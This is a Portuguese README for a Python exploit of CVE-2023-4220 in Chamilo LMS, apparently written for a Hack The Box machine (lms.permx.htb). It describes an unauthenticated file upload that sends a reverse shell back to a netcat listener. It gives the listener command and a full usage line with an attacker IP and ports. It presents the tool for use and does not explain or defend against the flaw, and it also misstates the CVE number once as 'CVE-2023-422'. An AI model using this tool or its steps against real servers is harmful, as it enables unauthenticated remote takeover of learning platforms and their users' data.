
Exploit em Python para CVE-2023-4220 no Chamilo LMS que faz upload de um arquivo e entrega um reverse shell não autenticado para um listener netcat.
pip install requests
O script python usa a vulnerabilidade CVE-2023-422 para enviar um arquivo para o servidor e usa esse arquivo para enviar um reverse shell para o listener netcat e tudo isso pode ser feito sem estar autenticado. No entanto, você precisará seguir os seguintes passos para usar o script python com sucesso.
Iniciar o listener netcat:
nc -lnvp 4444
Executando o Script Python (Exemplo):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
Por favor, deixe uma estrela se o seguinte exploit foi útil :)